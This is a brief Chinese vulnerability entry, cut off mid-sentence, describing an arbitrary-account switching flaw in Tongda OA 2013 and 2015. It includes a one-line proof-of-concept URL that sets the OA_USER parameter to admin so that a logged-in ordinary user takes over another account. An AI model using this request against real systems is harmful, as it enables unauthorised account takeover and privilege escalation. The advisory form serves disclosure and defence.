通达oa 任意账号跳转¶

一、漏洞简介¶

需要登录

2013、2015版本

POC:

http://0-sec.org/interface/ugo.php?OA_USER=admin

通过控制OA_USER参数进行任意⽤户的跳转，⽐如说你现在是个普通权限的⽤户，使用这个⻚面即可跳转到